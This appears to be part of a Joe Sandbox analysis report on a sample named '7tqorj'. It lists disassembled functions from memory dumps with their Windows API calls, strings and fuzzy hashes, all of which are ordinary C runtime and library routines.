Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

CorExitProcess, xrefs: 000000014000852A
mscoree.dll, xrefs: 0000000140008518

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFDA58040D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFDA58041F7
__AdjustPointer.LIBCMT ref: 00007FFDA5804242

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: 0e1b0a7ee760a2d831def7fc33a6e334971ebf660c511ea3328cda02516edaba
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: 98B1D222B4BA4A81EA65DB71946073C6390EF56F84F0986B5DE4D077A7DF3CE4428348

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFDA580FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDA580FB7C
_set_statfp.LIBCMT ref: 00007FFDA580FB97
_set_statfp.LIBCMT ref: 00007FFDA580FBB3
_set_statfp.LIBCMT ref: 00007FFDA580FBEF

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 18e2c2a7e58639a5acb22b9e2da42323282659d41fe44a4f721ebc54c64ae0ee
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: A911C832F49A0F42F7546379E57537910416F9BB70F1487B4E5AE063DF9E2C6841CA09

Function 00007FFDA5809684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096A3
FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096C2
FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096EA
FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096FB
FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA580970C

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 25abc415800ce9e55acc0cbf519ca6c8c4b27267bceb58e9f9c4ccf1748d3125
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: 42113DA0B0F29E45FA587B35657137962919F46BF0F5443B4E83E077DBEE2CE8418608

Function 00007FFDA5809518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFDA5809529
FlsSetValue.KERNEL32 ref: 00007FFDA5809548
FlsSetValue.KERNEL32 ref: 00007FFDA5809570
FlsSetValue.KERNEL32 ref: 00007FFDA5809581
FlsSetValue.KERNEL32 ref: 00007FFDA5809592

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 6203c6c73b1ed6350d2af1256c71950b7fa642fcd979c6a3877de6b6f9453246
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 5E11A8A0B0F24F4AFA68B776547237952819F47B70E5407B4D93E0A7EBED2CB8418609

Function 00007FFDA5805448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFDA58054B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFDA5805503

Strings

MOC, xrefs: 00007FFDA58054CC
RCC, xrefs: 00007FFDA58054D4

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: eb435cbddcc5b5d928c3f6b7330923de9e42251676578deb56d27cda76a029c2
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 7C919D72B097898AE710CB74E4903AD7BB0FF56B88F10426AEA4D17B56DF38D195CB04

Function 00007FFDA5803A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA5803A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFDA5803AFA
RtlUnwindEx.KERNEL32 ref: 00007FFDA5803B54

Strings

csm, xrefs: 00007FFDA5803AE1

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: 9674ff227cb1c85f7b42a119b24891a68d27336af04a769e0d3243f98b50ed33
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: 8851C132B0A64A8AEB149B39E46477C7391EF42F98F108270DA4A83786DF7DE941C704

Function 00007FFDA58059C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA58059F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFDA5805AD8

Strings

csm, xrefs: 00007FFDA5805A12
csm, xrefs: 00007FFDA5805B2A

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 845f3493bcaf7727eb828a4714818bab681142fc865c178aedb351ad374d45e1
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: 8A518F32B0938A8AEB749B3194A436877A0EF66F84F144275DA8D47B96CF3CF451C718

Function 00007FFDA58051D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFDA5805237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFDA5805283

Strings

RCC, xrefs: 00007FFDA5805253
MOC, xrefs: 00007FFDA580524B

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: 0eabc7f6b573155b7cb7b8caad75351632a4381d8a036f9baf42b61df5a324c1
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: B661A172A09BC985EB709B25E4503AAB7A0FF96B84F044325EB9D07B56CF7CD190CB04

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

kernel32.dll, xrefs: 000000014000EE26
InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFDA580E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFDA580E473
WriteFile.KERNEL32 ref: 00007FFDA580E73B
WriteFile.KERNEL32 ref: 00007FFDA580E781
GetLastError.KERNEL32 ref: 00007FFDA580E837

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: aeedd7f564a67e57ed220c44ddd5d93f99ac5cac7320b008971b35ef9a4a2694
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: 1ED10232F0AA8989E710CF75E4602ED37B1FB46B98B044276DE5D97B9ADE38D406C344

Function 00007FFDA580ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA580ED07), ref: 00007FFDA580EE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA580ED07), ref: 00007FFDA580EEC3

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: a6251fa9b2e0559b842ce224f064285f7dbf61aabd1d36480ded7b550a35f446
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: AD91B522B1B65985F7608F75A4A037E6BA0BF06F88F1442B9DE4E56786DF38D442C708

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

